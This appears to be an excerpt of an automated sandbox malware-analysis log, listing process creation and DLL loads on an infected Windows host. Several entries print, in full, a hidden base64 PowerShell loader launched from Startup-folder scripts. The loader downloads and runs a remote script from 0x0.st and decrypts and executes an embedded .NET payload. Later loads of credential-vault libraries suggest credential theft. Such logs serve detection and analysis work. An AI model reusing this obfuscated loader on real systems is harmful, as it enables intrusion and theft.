QUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_50006331.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_1baed2c6.cmd"
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4ICgoaWV4ICgoJ2lNSUNST1NPRlRTRVJWSUNFVVBEQVRFU3dyIC1NSUNST1NPRlRTRVJWSUNFVVBEQVRFU1VzZUJNSUNST1NPRlRTRVJWSUNFVVBEQVRFU2FzaWNQTUlDUk9TT0ZUU0VSVklDRVVQREFURVNhcnNpbmcgIk1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTaE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTcE1JQ1JPU09GVFNFUlZJQ0VVUERBVEVTc01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTOi8vMHhNSUNST1NPRlRTRVJWSUNFVVBEQVRFUzAuc3QvTUlDUk9TT0ZUU0VSVklDRVVQREFURVM4S01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTdVYucHMxIicpLlJlcGxhY2UoJ01JQ1JPU09GVFNFUlZJQ0VVUERBVEVTJywnJykpKS5Db250ZW50KTtmdW5jdGlvbiBzZXJqdygkcGFyYW1fdmFyKXsJJGFlc192YXI9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7CSRhZXNfdmFyLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzsJJGFlc192YXIuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OwkkYWVzX3Zhci5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnMFVVNVczNDRoelVpZU8xM3ROWmJTMEVFT3F2V2tVVjFFV3R1VC9PaGppVT0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnb0NBVEJiSlVmSWNpQ1RKQWt1TGwxZz09Jyk7CSRkZWNyeXB0b3JfdmFyPSRhZXNfdmFyLkNyZWF0ZURlY3J5cHRvcigpOwkkcmV0dXJuX3Zhcj0kZGVjcnlwdG9yX3Zhci5UcmFuc2Zvcm1GaW5hbEJsb2NrKCRwYXJhbV92YXIsIDAsICRwYXJhbV92YXIuTGVuZ3RoKTsJJGRlY3J5cHRvcl92YXIuRGlzcG9zZSgpOwkkYWVzX3Zhci5EaXNwb3NlKCk7CSRyZXR1cm5fdmFyO31mdW5jdGlvbiBlYmlidCgkcGFyYW1fdmFyKXsJSUVYICckZGZ6cWU9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTUFCQ2VtQUJDb3JBQkN5U0FCQ3RyQUJDZWFBQkNtKCwkcGFyYW1fdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckaGpwZHc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRwbmVpYz1OZXctT2JqZWN0IFN5c3RlbS5JTy5DQUJDb21BQkNwckFCQ2VBQkNzc0FCQ2lvQUJDbi5BQkNHWkFCQ2lwQUJDU3RBQkNyZUFCQ2FtQUJDKCRkZnpxZSwgW0lPLkNBQkNvbUFCQ3ByQUJDZXNBQkNzaUFCQ29uQUJDLkNvQUJDbXBBQkNyZUFCQ3NzQUJDaUFCQ29BQkNuQUJDTW9kZV06OkRBQkNlQUJDY0FCQ29tcEFCQ3JlQUJDc3MpOycuUmVwbGFjZSgnQUJDJywgJycpOwkkcG5laWMuQ29weVRvKCRoanBkdyk7CSRwbmVpYy5EaXNwb3NlKCk7CSRkZnpxZS5EaXNwb3NlKCk7CSRoanBkdy5EaXNwb3NlKCk7CSRoanBkdy5Ub0FycmF5KCk7fWZ1bmN0aW9uIHFoaGZvKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewlJRVggJyR4dnhhdj1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGRuZm9sPSR4dnhhdi5BQkNFQUJDbkFCQ3RBQkNyQUJDeUFCQ1BBQkNvQUJDaUFCQ25BQkN0QUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRkbmZvbC5BQkNJQUJDbkFCQ3ZBQkNvQUJDa0FCQ2VBQkMoJG51bGwsICRwYXJhbTJfdmFyKTsnLlJlcGxhY2UoJ0FCQycsICcnKTt9JGhiZiA9ICRlbnY6VVNFUk5BTUU7JGZ5cmJ1ID0gJ0M6XFVzZXJzXCcgKyAkaGJmICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkZnlyYnU7JHBlcGV2PVtTeXN0ZW0uSU8uRmlsZV06OigndHhlVGxsQWRhZVInWy0xLi4tMTFdIC1qb2luICcnKSg
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_aa280a72.cmd"
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pstorec.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
